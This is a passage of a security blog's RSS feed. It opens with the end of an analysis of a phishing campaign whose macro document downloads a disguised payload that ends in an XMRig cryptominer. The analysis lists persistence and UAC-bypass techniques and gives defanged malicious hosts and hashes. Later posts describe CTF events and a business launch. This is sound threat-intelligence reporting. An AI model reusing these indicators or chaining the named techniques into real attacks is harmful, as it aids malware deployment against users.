https://flaviu.io/content/images/2021/08/Screenshot-2021-08-23-at-09.58.47.png 787w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Analysing Phishing Document</figcaption></figure><p>Once enabled, the macros within the document will attempt to download another file that was located at <a href="https://divine-bar-3d75.visual-candy.workers">https://divine-bar-3d75.visual-candy.workers</a>[.]dev/blackhole.png.</p><p>This appears to be an image file, but is it?<br>This file was disguised as a picture (PNG format) and it&apos;s the first payload to be downloaded. It is very common for advanced threat actors to split their payloads into smaller chunks to avoid downloading large files; they also use random timeouts between downloading and executing these scripts. This helps them avoid detection by antivirus software. Typically you see an obfuscated PowerShell script that retrieves more files that make up the final payload. </p><p>After some more digging, I stumbled on another CloudFlare domain that hosts more instructions to be executed on the victim&apos;s machine. This was available at: <a href="https://cdn.globalsigncdn.workers">https://cdn.globalsigncdn.workers</a>[.]dev</p><figure class="kg-card kg-gallery-card kg-width-wide"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/08/E9gqOmCX0AIOXmr.png" width="1824" height="479" loading="lazy" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" srcset="https://flaviu.io/content/images/size/w600/2021/08/E9gqOmCX0AIOXmr.png 600w, https://flaviu.io/content/images/size/w1000/2021/08/E9gqOmCX0AIOXmr.png 1000w, https://flaviu.io/content/images/size/w1600/2021/08/E9gqOmCX0AIOXmr.png 1600w, https://flaviu.io/content/images/2021/08/E9gqOmCX0AIOXmr.png 1824w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img 
src="https://flaviu.io/content/images/2021/08/E9grrA3XsAURGM8.png" width="1781" height="821" loading="lazy" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" srcset="https://flaviu.io/content/images/size/w600/2021/08/E9grrA3XsAURGM8.png 600w, https://flaviu.io/content/images/size/w1000/2021/08/E9grrA3XsAURGM8.png 1000w, https://flaviu.io/content/images/size/w1600/2021/08/E9grrA3XsAURGM8.png 1600w, https://flaviu.io/content/images/2021/08/E9grrA3XsAURGM8.png 1781w" sizes="(min-width: 720px) 720px"></div></div></div></figure><p>This sample contains many TTPs:</p><ul><li>Normal.dotm (persistence)</li><li>Run key to launch Normal.dotm via PS (persistence) by winword</li><li>Task scheduler to launch PS by winword</li><li>WMI persistence, COM hijack and UAC bypass via the SilentCleanup task</li></ul><p>The final payload &quot;appears&quot; to be linked to xmrig and is used for cryptojacking.</p><p><br>Cryptojacking is a slow and tedious way to generate illicit income; that&#x2019;s why the actor is using a botnet to infect as many devices as possible. Owning multiple systems for mining is not cheap, so attackers try the next best thing: remotely compromising devices and using them for mining instead.</p><p><br>XMRig is a miner, a type of threat used to make money at the expense of computer users by using their infected computers to mine Monero, a cryptocurrency. XMRig can cause a computer to overheat and perform badly. 
XMRig uses additional system resources, taking these away from the victim.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/08/E9gwyTyWYAg2gIt.png" class="kg-image" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" loading="lazy" width="686" height="486" srcset="https://flaviu.io/content/images/size/w600/2021/08/E9gwyTyWYAg2gIt.png 600w, https://flaviu.io/content/images/2021/08/E9gwyTyWYAg2gIt.png 686w"><figcaption>Final Payload</figcaption></figure><p>We can see they are using the RandomX algorithm.</p><p><br>RandomX is the name of the new mining algorithm for Monero, the privacy coin whose objective is to keep the network protected from ASIC mining, allowing only CPU mining.</p><h2 id="conclusion">Conclusion</h2><p>This phishing campaign illustrates the creativity and evolving techniques used by threat actors to distribute weaponised files convincingly.</p><p><br>While the e-mail sender was a suspicious domain, the XSS vulnerability was actively exploited to make it appear as if the invoices were legitimately downloaded from UPS; many people would have fallen for this scam. But did they? </p><p>That&apos;s a story for another article; perhaps if I can find where the mining workers are connecting and monitor that mining pool, I could come back with some statistics, e.g. infection rate, money generated and time frame for this campaign. 
Game on!</p><p>I don&apos;t believe this to be an APT gang; however, the chaining of vulnerabilities from an offensive security perspective was pretty ingenious.</p><p>I will continue digging for more information to find the source of this attack; if I find anything new, I will update my blog post.<br>The UPS.com Cross-Site Scripting vulnerability has since been fixed.</p><p>Hash1: <a href="https://www.virustotal.com/gui/file/841e6458ddc277a1ffdec7907b3e0be029dbe57af88fb11fcceb23f988cf7432/details">841e6458ddc277a1ffdec7907b3e0be029dbe57af88fb11fcceb23f988cf7432</a></p><p>Hash2: <a href="https://www.virustotal.com/gui/file/ae1123c24bb52dce5ec0f0a6c947785012702dc7c3339188baee917721351ff5/detection">ae1123c24bb52dce5ec0f0a6c947785012702dc7c3339188baee917721351ff5</a></p><!--kg-card-begin: markdown--><p>Main hosts: cdn.globalsigncdn.workers[.]dev<br>
divine-bar-3d75.visual-candy.workers[.]dev<br>
m.media-amazon.workers[.]dev</p>
<!--kg-card-end: markdown--><p> </p><p>References:</p><p><a href="https://www.virustotal.com/gui/file/841e6458ddc277a1ffdec7907b3e0be029dbe57af88fb11fcceb23f988cf7432/details">Virus Total Scan</a></p><figure class="kg-card kg-bookmark-card kg-card-hascaption"><a class="kg-bookmark-container" href="https://app.any.run/tasks/96d5d60d-a98d-42b8-80a6-9cfd9d890265/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">INVOICE_1Z7301XR1412220178.docm (MD5: 8EC2C162D57A426A32E27745D9854F93) - Interactive analysis - ANY.RUN</div><div class="kg-bookmark-description">Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://app.any.run/img/favicon.ico" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign"></div></div><div class="kg-bookmark-thumbnail"><img src="https://content.any.run/tasks/96d5d60d-a98d-42b8-80a6-9cfd9d890265/download/screens/ccb214e4-eec3-4a25-a02b-52d4096a99dc/image.jpeg" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign"></div></a><figcaption>AnyRun Interactive analysis of infected document</figcaption></figure><figure class="kg-card kg-bookmark-card kg-card-hascaption"><a class="kg-bookmark-container" href="https://urlscan.io/result/4d8723d5-7b62-4a9f-8ebc-1d55881454a4/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">divine-bar-3d75.visual-candy.workers.dev - urlscan.io</div><div class="kg-bookmark-description">urlscan.io - Website scanner for suspicious and malicious URLs</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://urlscan.io/img/urlscan_256.png" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign"><span class="kg-bookmark-author">urlscan.io urlscan.io</span><span class="kg-bookmark-publisher">urlscan.io</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://urlscan.io/img/urlscan_256.png" alt="The 
&quot;Almost&quot; Perfect Phishing C@mpaign"></div></a><figcaption>Suspicious URL Analysis</figcaption></figure><!--kg-card-begin: markdown--><p>Have you got any suggestions or questions for me ? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thank you for reading my article. Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[What does it take to be a web application security consultant?]]></title><description><![CDATA[Very recently, I participated in a CTF. While I was still in the zone, I came across an interesting post on LinkedIn that said What does it take to be a web application security consultant?]]></description><link>https://flaviu.io/what-does-it-take-to-be-a-application-security-consultant/</link><guid isPermaLink="false">60dc71106351be078041755e</guid><category><![CDATA[cybersecurity]]></category><category><![CDATA[hacking]]></category><category><![CDATA[achievements]]></category><category><![CDATA[learning]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Thu, 01 Jul 2021 09:31:58 GMT</pubDate><media:content url="https://flaviu.io/content/images/2021/06/websec.jpg" medium="image"/><content:encoded><![CDATA[<hr><img src="https://flaviu.io/content/images/2021/06/websec.jpg" alt="What does it take to be a web application security consultant?"><p>Very recently, I participated in a CTF. While I was still in the zone, I came across an interesting post on LinkedIn that said What does it take to be a web application security consultant?</p><p>The author was <a href="https://www.mdsec.co.uk/staff/marcus-pinto/">Marcus Pinto</a>, Owner of <a href="https://www.mdsec.co.uk/">MDSec</a>, a security consulting and education company with expertise that is backed by the <a href="https://www.mdsec.co.uk/2015/02/the-mobile-application-hackers-handbook/">Web and Mobile Application Hackers Handbook</a> series.</p><p>The post stated that if you want to see what it takes to be a web application security consultant, check out the free training platform. To join, the applicant would send an e-mail to <a href="mailto:contact@mdsec.co.uk">contact@mdsec.co.uk</a> and request an account on the free CTF portal. 
They stated that if you knock down all the challenges, expect a call (perfect for job seekers!).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/07/mdsec.PNG" class="kg-image" alt="What does it take to be a web application security consultant?" loading="lazy" width="850" height="929" srcset="https://flaviu.io/content/images/size/w600/2021/07/mdsec.PNG 600w, https://flaviu.io/content/images/2021/07/mdsec.PNG 850w" sizes="(min-width: 720px) 720px"><figcaption>MDSec LinkedIn Post</figcaption></figure><p>This got me intrigued. What does a CTF set up by a top security company look like?</p><p>I sent an e-mail and asked for access, and got an e-mail back very promptly with the account details and a few instructions.</p><p><strong>Content:</strong></p><p>The content here will give you insight into:</p><ul><li>Uncovering subtle flaws in applications</li><li>Expanding your armory of tools and techniques</li><li>Writing custom code (Burp extensions)</li><li>Practicing key vulnerabilities</li></ul><hr><p><strong>Prerequisite Knowledge:</strong></p><p>It is assumed that you have a working knowledge of:</p><ul><li>Burp Proxy, Intruder, Repeater, Scanner</li><li>At least one programming language (Python etc.)</li><li>HTML</li><li>Basic understanding of SSL</li><li>HTTP</li><li>JavaScript</li><li>The OWASP Top 10</li><li>XSS, SQLi, Traversal</li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/image-7.png" class="kg-image" alt="What does it take to be a web application security consultant?" 
loading="lazy" width="1766" height="1109" srcset="https://flaviu.io/content/images/size/w600/2021/06/image-7.png 600w, https://flaviu.io/content/images/size/w1000/2021/06/image-7.png 1000w, https://flaviu.io/content/images/size/w1600/2021/06/image-7.png 1600w, https://flaviu.io/content/images/2021/06/image-7.png 1766w" sizes="(min-width: 720px) 720px"><figcaption>CTF portal MDSec</figcaption></figure><p>The starting point is the challenges in the Interview section. The difficulty ranges from low to hard. There is no requirement to connect to a private network, although Burp or OWASP ZAP will be needed later. Each challenge has an introductory description and sometimes even a hint to help you get started.</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/06/ctf.PNG" width="1751" height="1159" loading="lazy" alt="What does it take to be a web application security consultant?" srcset="https://flaviu.io/content/images/size/w600/2021/06/ctf.PNG 600w, https://flaviu.io/content/images/size/w1000/2021/06/ctf.PNG 1000w, https://flaviu.io/content/images/size/w1600/2021/06/ctf.PNG 1600w, https://flaviu.io/content/images/2021/06/ctf.PNG 1751w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/06/ctf2.PNG" width="734" height="580" loading="lazy" alt="What does it take to be a web application security consultant?" srcset="https://flaviu.io/content/images/size/w600/2021/06/ctf2.PNG 600w, https://flaviu.io/content/images/2021/06/ctf2.PNG 734w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Challenge Sample MDSec</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/image-9.png" class="kg-image" alt="What does it take to be a web application security consultant?" 
loading="lazy" width="2000" height="424" srcset="https://flaviu.io/content/images/size/w600/2021/06/image-9.png 600w, https://flaviu.io/content/images/size/w1000/2021/06/image-9.png 1000w, https://flaviu.io/content/images/size/w1600/2021/06/image-9.png 1600w, https://flaviu.io/content/images/size/w2400/2021/06/image-9.png 2400w" sizes="(min-width: 720px) 720px"><figcaption>Bypass the UI</figcaption></figure><p>My aim is to share this great opportunity with those looking for a job within the UK. It is also great for those who like a challenge and hands-on practice.</p><p>MDSec also offers the following training:</p><ul><li><a href="https://www.mdsec.co.uk/training/adversary-simulation-red-team-tactics/">Adversary Simulation and Red Team Tactics</a></li><li><a href="https://www.mdsec.co.uk/training/beyond-the-web-application-hackers-handbook-advanced/">Beyond the Web Application Hackers Handbook (Advanced)</a></li><li><a href="https://www.mdsec.co.uk/training/mahh-training-live/">The Mobile Application Hackers Handbook, Live Edition</a></li><li><a href="https://www.mdsec.co.uk/training/wahh-live-training/">The Web Application Hackers Handbook, Live Edition (Beginner Course)</a></li></ul><p>I am <u>not affiliated with or being paid to advertise</u> the above courses. If you liked the challenges or could not solve them, you can sign up for the (Advanced) course (in this case). This will teach you the methodology you need to solve them.</p><hr><h3 id="conclusions">Conclusions</h3><p><strong>So what does it take to be a web application security consultant?</strong></p><hr><p>For some companies it takes a Cyber Security degree, and for some it could be as little as solving web app challenges as proof of your skill.</p><p>Application security is fast becoming the most challenging aspect of information technology. 
Not surprisingly, it drives demand for highly skilled consultants.</p><p><strong>Top Required Skills</strong> for a <strong>Security Consultant</strong></p><p>Students planning to become security consultants should learn hard skills such as computer programming, networking, and security configuration. Taking courses like cloud computing infrastructure and services, and network and security foundations, will prepare you to understand the complicated technical aspects of security consulting.</p><p>Though it&apos;s natural to gravitate towards certain soft skills over others, students can greatly strengthen areas such as communication, problem-solving, and leadership skills by obtaining a degree. Courses in critical thinking and logic, communication, and managing IT can prepare you for leadership in the field.</p><p>Security consultants need to engage in critical thinking to analyse security issues and respond quickly to breaches&#x2014;or even better, find problems before they arise. Communication is also essential, as they must communicate with top executives about the company&apos;s security operations, outlining issues so that managers can both understand them and make informed decisions. Security consultants may need to communicate via written reports or through oral presentations, and they may also be called upon to tutor non-IT staff in best practices.</p><p>Security consultants who develop leadership skills and strong management techniques can advance to oversee entire departments and projects. Many companies employ teams of IT personnel, which good managers can lead to implement and maintain their cybersecurity protocols.</p><hr><p><strong>About MDSec&apos;s Web Challenges</strong></p><p>I thoroughly enjoyed the challenges so far. You can see I still have one challenge left to complete from the Interview section.</p><p>You can probably imagine a few of the challenges take time to figure out, especially the challenges that you have not encountered before. 
There are nine more labs to which I do not have access yet, but I assume each lab will be unlocked after I complete the Interview section.</p><p>The exercises were very realistic in terms of the kinds of vulnerabilities hiding in modern web applications. I like web testing, but there is so much to it. The best approach, in my opinion, is practicing; you will get a lot of exposure and gain knowledge with a hands-on approach from different sources. </p><p>There are a lot of platforms, paid and free, to practice on and, by sticking to just one or two, in my opinion, you limit yourself. Explore and find different avenues every time an opportunity is presented.</p><p>PS: Don&apos;t ask Marcus for hints! You won&apos;t get any. &#x1F607;</p><!--kg-card-begin: markdown--><p>Have you got any suggestions or questions for me? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thank you for reading my article. Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Le Tour Du Hack 2021]]></title><description><![CDATA[Welcome! I'm glad you're here. We need more people like you.
This blog will be about the LTDH21 annual flagship event organised by ENUSEC - a student society based in Edinburgh interested in all aspects of security.
If you're planning to make a living in defense, you have to think like the offense.]]></description><link>https://flaviu.io/le-tour-du-hack-2021/</link><guid isPermaLink="false">60d5c2b26351be0780417393</guid><category><![CDATA[cybersecurity]]></category><category><![CDATA[hacking]]></category><category><![CDATA[achievements]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Fri, 25 Jun 2021 14:17:21 GMT</pubDate><media:content url="https://flaviu.io/content/images/2021/06/CTF.jpg" medium="image"/><content:encoded><![CDATA[<hr><blockquote>&quot;Life is not a problem to be solved, but a reality to be experienced.&quot; Soren Kierkegaard</blockquote><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/reality.jpg" class="kg-image" alt="Le Tour Du Hack 2021" loading="lazy" width="640" height="426" srcset="https://flaviu.io/content/images/size/w600/2021/06/reality.jpg 600w, https://flaviu.io/content/images/2021/06/reality.jpg 640w"><figcaption>Reality Ahead!</figcaption></figure><img src="https://flaviu.io/content/images/2021/06/CTF.jpg" alt="Le Tour Du Hack 2021"><p>Welcome! I&apos;m glad you&apos;re here. We need more people like you.</p><p>This blog will be about the LTDH21 annual flagship event organised by ENUSEC - a student society based in Edinburgh interested in all aspects of security. This is not a walkthrough, although I plan to cover a few challenges that we solved in a future blog post.</p><p>If you&apos;re planning to make a living in defense, you have to think like the offense.</p><p>Participate and learn to win in Capture the Flag (CTF). These competitions distil the disciplines of professional computer security into short, objective and quantifiable exercises. 
CTF competitions mainly measure vulnerability discovery, exploit development, toolkit creation, and operational tradecraft.</p><p>Whether you want to succeed at CTFs or in a computer security professional job, you&apos;ll need to become an expert in at least one of these disciplines, ideally as many as possible.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/discipline.jpg" class="kg-image" alt="Le Tour Du Hack 2021" loading="lazy" width="640" height="480" srcset="https://flaviu.io/content/images/size/w600/2021/06/discipline.jpg 600w, https://flaviu.io/content/images/2021/06/discipline.jpg 640w"><figcaption>D C R</figcaption></figure><hr><p>A little bit about CTFs if you&apos;ve never participated in one before. CTFs are events that are usually hosted at information security conferences. These events consist of a series of challenges that vary in their degree of difficulty and that require participants to exercise different skillsets to solve. Once an individual challenge is solved, a &quot;flag&quot; is given to the player and they submit this flag to the CTF server to earn points. Players can be lone wolves who attempt the various challenges by themselves, or they can work with others to attempt to score the highest number of points as a team.</p><p>CTF events are usually timed, and the points are totalled once the time has expired. 
The winning player / team will be the one that solved the most challenges and thus secured the highest score.</p><p>Types of Events - The two most common types are:</p><hr><p>Red Team/Blue Team - In this style of event the red team attempts to capture flags while the blue team attempts to defend the various flags from being captured.<br></p><p>Red Team - Usually involves one or more people, working alone or on a team, who attempt to capture various flags while there is no team defending them.</p><p>Types of Challenges - Some popular areas of focus are:</p><hr><p>Programming - Usually requires some sort of programming to solve. In most cases, it will involve a mixture of programming and some reverse engineering.<br></p><p>Crypto - Features common &quot;real world&quot; algorithms or scenarios, often including the ever-popular ransomware type of malware.<br></p><p>Web - Usually vulnerabilities that are in the OWASP Top 10.<br></p><p>Reverse Engineering - Typically the process of taking a compiled machine-code or bytecode program and converting it back to a more human-readable format.<br></p><p>OSINT - Known as open-source intelligence; you will be required to dig deep to find old information, like a user&apos;s first tweet for example.<br></p><p>Pwn - In these challenges you usually have to exploit buffer overflows; using the CTF framework called pwntools, you will develop your Python exploit.<br></p><p>Misc - Miscellaneous challenges; these are a bit random and can be of various types.</p><hr><p>Okay, let&apos;s talk about the event. </p><p>I was notified about this virtual event by a fellow member of the Ethical Hacking Society at GCU. I had never participated before in any of ENUSEC&apos;s CTFs; I know their first Le Tour Du Hack took place in 2017. I simply couldn&apos;t let the opportunity pass. As usual I am very busy, involved in a few projects, but I thought: what&apos;s the worst that could happen? I must try this CTF. 
</p><p>So I signed up. The event was a <strong>2 day CTF</strong> for all abilities! The top 3 teams would win the following prizes:</p><p><strong>1st Place</strong> -&gt; &#xA3;1000</p><p><strong>2nd Place</strong> -&gt; &#xA3;500</p><p><strong>3rd Place</strong> -&gt; &#xA3;250</p><p>They also had <strong>50 free LTDH21 swag bags </strong>for 50 lucky participants, including a T-shirt and other goodies. Thanks to <a href="https://secureworks.com/">SecureWorks</a> for sponsoring this wonderful event.</p><p>The event started on Sat, 19 Jun 2021 at 10:00 am and finished on Sun, 20 Jun 2021, 19:00 BST. To begin with we were a team of two for most of Saturday, and then in the evening I saw another mate was competing alone so I invited him to join us. </p><p>Within two hours we already had over 4k points and were grinding away to climb the leaderboard; we were in 8th and rocking. We had managed to complete <strong>30</strong> challenges from the misc, reverse engineering, OSINT (trivia), and web categories. I was chuffed with the result so far because I wasn&apos;t thinking we would do so well. My personal aim was to be in the Top 10 at least and just enjoy the event. 
</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/image.png" class="kg-image" alt="Le Tour Du Hack 2021" loading="lazy" width="1890" height="559" srcset="https://flaviu.io/content/images/size/w600/2021/06/image.png 600w, https://flaviu.io/content/images/size/w1000/2021/06/image.png 1000w, https://flaviu.io/content/images/size/w1600/2021/06/image.png 1600w, https://flaviu.io/content/images/2021/06/image.png 1890w" sizes="(min-width: 720px) 720px"><figcaption>GCU_CRACKERS Saturday Scoreboard</figcaption></figure><p>We finished Saturday around 23:00 and started again on Sunday, mainly going over the challenges we couldn&apos;t solve the previous day. I convinced a few other mates to join and we were now a team of five. It was a slow day because we had only the hardest challenges left to solve, and we then started dropping a few places on the leaderboard. However, I was still happy that we remained in the Top 10 until nearly the end of the event. We were not chasing to win this event but to have fun; we had a tiny team put together very fast at the last second, unlike other teams who had 10 to 15 members. &#x1F440; </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/image-1.png" class="kg-image" alt="Le Tour Du Hack 2021" loading="lazy" width="1811" height="558" srcset="https://flaviu.io/content/images/size/w600/2021/06/image-1.png 600w, https://flaviu.io/content/images/size/w1000/2021/06/image-1.png 1000w, https://flaviu.io/content/images/size/w1600/2021/06/image-1.png 1600w, https://flaviu.io/content/images/2021/06/image-1.png 1811w" sizes="(min-width: 720px) 720px"><figcaption>GCU_CRACKERS Sunday Scoreboard</figcaption></figure><p>We managed to solve another 7 challenges and settled on 11th place. We were really close to a few Web challenges but couldn&apos;t quite figure out the last part to get the flags. 
</p><p>I have to say I <strong>totally enjoyed</strong> this CTF and I will definitely recommend it to beginners. I would say the challenges were not too hard, unlike other events I have been to such as <a href="https://www.hackthebox.eu/universities/university-ctf-2020">Hack The Box University CTF</a>, <a href="https://tryhackme.com/hackback2">Try Hack Me (HackBack)</a> or <a href="https://pwned.sigint.mx/">pwnED</a>.</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/06/chall.PNG" width="1729" height="992" loading="lazy" alt="Le Tour Du Hack 2021" srcset="https://flaviu.io/content/images/size/w600/2021/06/chall.PNG 600w, https://flaviu.io/content/images/size/w1000/2021/06/chall.PNG 1000w, https://flaviu.io/content/images/size/w1600/2021/06/chall.PNG 1600w, https://flaviu.io/content/images/2021/06/chall.PNG 1729w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/06/chall1.PNG" width="1728" height="999" loading="lazy" alt="Le Tour Du Hack 2021" srcset="https://flaviu.io/content/images/size/w600/2021/06/chall1.PNG 600w, https://flaviu.io/content/images/size/w1000/2021/06/chall1.PNG 1000w, https://flaviu.io/content/images/size/w1600/2021/06/chall1.PNG 1600w, https://flaviu.io/content/images/2021/06/chall1.PNG 1728w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/06/chall3.PNG" width="1784" height="1165" loading="lazy" alt="Le Tour Du Hack 2021" srcset="https://flaviu.io/content/images/size/w600/2021/06/chall3.PNG 600w, https://flaviu.io/content/images/size/w1000/2021/06/chall3.PNG 1000w, https://flaviu.io/content/images/size/w1600/2021/06/chall3.PNG 1600w, https://flaviu.io/content/images/2021/06/chall3.PNG 1784w" sizes="(min-width: 720px) 
720px"></div></div></div><figcaption>Challenges LTDH21</figcaption></figure><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/06/image-2-1.png" width="1767" height="1138" loading="lazy" alt="Le Tour Du Hack 2021" srcset="https://flaviu.io/content/images/size/w600/2021/06/image-2-1.png 600w, https://flaviu.io/content/images/size/w1000/2021/06/image-2-1.png 1000w, https://flaviu.io/content/images/size/w1600/2021/06/image-2-1.png 1600w, https://flaviu.io/content/images/2021/06/image-2-1.png 1767w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/06/76566db6-edf5-4bdd-ac15-a2701f4baeee.png" width="1609" height="935" loading="lazy" alt="Le Tour Du Hack 2021" srcset="https://flaviu.io/content/images/size/w600/2021/06/76566db6-edf5-4bdd-ac15-a2701f4baeee.png 600w, https://flaviu.io/content/images/size/w1000/2021/06/76566db6-edf5-4bdd-ac15-a2701f4baeee.png 1000w, https://flaviu.io/content/images/size/w1600/2021/06/76566db6-edf5-4bdd-ac15-a2701f4baeee.png 1600w, https://flaviu.io/content/images/2021/06/76566db6-edf5-4bdd-ac15-a2701f4baeee.png 1609w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Scoreboard, Top 10 teams</figcaption></figure><p>Congrats to <a href="https://sigint.mx/">SIGINT</a>, crOwn and <a href="https://hacksoc.co.uk/">theIgloo </a>(Abertay Hackers) for winning the competition!</p><p>And many thanks to my fellow teammates for their participation in the CTF; couldn&apos;t have done it without you. We have learned a ton and had a great weekend. If time allows, I will post a follow-up blog on how we solved a few of the challenges.</p><p>I hope face to face CTFs will be allowed again soon. 
I&apos;m getting flashbacks of &#x1F863; our last in-person CTF.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/image-6.png" class="kg-image" alt="Le Tour Du Hack 2021" loading="lazy" width="2000" height="1333" srcset="https://flaviu.io/content/images/size/w600/2021/06/image-6.png 600w, https://flaviu.io/content/images/size/w1000/2021/06/image-6.png 1000w, https://flaviu.io/content/images/size/w1600/2021/06/image-6.png 1600w, https://flaviu.io/content/images/2021/06/image-6.png 2048w" sizes="(min-width: 720px) 720px"><figcaption>pwnED 2020 , 4th Place</figcaption></figure><p>To be continued ...</p><!--kg-card-begin: markdown--><p>Have you got any suggestions for me? Get in touch!</p>
<p>Thank you for reading my article. Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Octavis.io - We have officially launched!]]></title><description><![CDATA[I started this blog so that I could share with you my findings when it comes to vulnerabilities. As you may have noticed there have not been any significant findings of late; this is not because I have been looking, in fact quite the opposite.]]></description><link>https://flaviu.io/octavis-officially-launched/</link><guid isPermaLink="false">60c1f4136351be0780417181</guid><category><![CDATA[octavis.io]]></category><category><![CDATA[start-up]]></category><category><![CDATA[web design]]></category><category><![CDATA[search engine optimisation]]></category><category><![CDATA[web management]]></category><category><![CDATA[octavis]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Thu, 10 Jun 2021 14:51:05 GMT</pubDate><media:content url="https://flaviu.io/content/images/2021/06/smile.jpg" medium="image"/><content:encoded><![CDATA[<hr><img src="https://flaviu.io/content/images/2021/06/smile.jpg" alt="Octavis.io - We have officially launched!"><p>I started this blog so that I could share with you my findings when it comes to vulnerabilities. As you may have noticed there have not been any significant findings of late; this is not because I have been looking, in fact quite the opposite.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/looking.jpg" class="kg-image" alt="Octavis.io - We have officially launched!" 
loading="lazy" width="1920" height="1080" srcset="https://flaviu.io/content/images/size/w600/2021/06/looking.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/06/looking.jpg 1000w, https://flaviu.io/content/images/size/w1600/2021/06/looking.jpg 1600w, https://flaviu.io/content/images/2021/06/looking.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>looking</figcaption></figure><p>I had an idea over a year ago about creating a business that would provide much-needed digital services at a competitive price. I wanted the business to be the champion for small-to-medium businesses, a place where they could go and feel that we as a business cared about them and their business, not just our bottom line. We feel that if we help others and we are fair with our offerings, the wheel will turn round.</p><blockquote>&quot;The wheel of fortune turns round incessantly, and who can say to himself, I shall today be uppermost.&quot;</blockquote><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/do-something-great.jpg" class="kg-image" alt="Octavis.io - We have officially launched!" loading="lazy" width="1920" height="1280" srcset="https://flaviu.io/content/images/size/w600/2021/06/do-something-great.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/06/do-something-great.jpg 1000w, https://flaviu.io/content/images/size/w1600/2021/06/do-something-great.jpg 1600w, https://flaviu.io/content/images/2021/06/do-something-great.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>Do Something Great!</figcaption></figure><p>We wanted to create a business and combine two services that originate from our background skills, User Experience/Interface with Design Innovation and Cyber Security. </p><p>What started off as a very ambitious project, joining two of the most needed services, Cyber Security and Digital Marketing. 
Besides the services we offer now, we had planned to offer Security services, but we soon realised this would be too intensive to start, so we scaled back. This will allow room for personal development (yayy!), although these services will be added in due course.</p><p>When I have an idea, I research, research and research more. This is where I have been.</p><p>There are a multitude of agencies and freelancers building websites but not many create with UX/UI, and most importantly <strong>security </strong>in mind. This is one aspect where we differentiate from our competitors: we help our customers make the best choices and guide them every step of the way to achieve the end goal.</p><p>The sites are built using modern web design techniques and the latest technology, therefore empowered for high performance, responsive across many devices, highly customisable and <strong>offensive security</strong> proofed. </p><blockquote>&quot;Don&apos;t run before you can crawl.&quot; </blockquote><p>We built our website from the bottom up ourselves and researched the services that were the most sought after by SMEs. We are currently offering <a href="https://octavis.io/website-design-and-development/">Website Design and Development</a>, <a href="https://octavis.io/search-engine-optimisation/">Search Engine Optimisation</a> and <a href="https://octavis.io/website-management/">Website Management</a>. We have seen other competitors provide these services at exorbitant rates, and wanted to make them more accessible.</p><p>One aspect of the business that we are most proud of is the <strong>charitable </strong>side. We could not find anyone else offering this service. Providing help through building free websites to not-for-profit newly established charities. We look forward to getting involved in projects with a cause. 
